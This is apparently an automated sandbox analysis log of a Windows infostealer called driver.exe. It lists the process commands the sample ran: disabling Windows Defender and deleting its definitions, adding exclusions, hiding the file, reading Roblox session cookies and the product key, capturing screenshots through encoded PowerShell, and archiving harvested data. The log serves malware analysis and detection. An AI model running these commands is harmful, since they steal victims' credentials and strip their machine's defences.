JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\driver.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5CD.tmp" "c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand 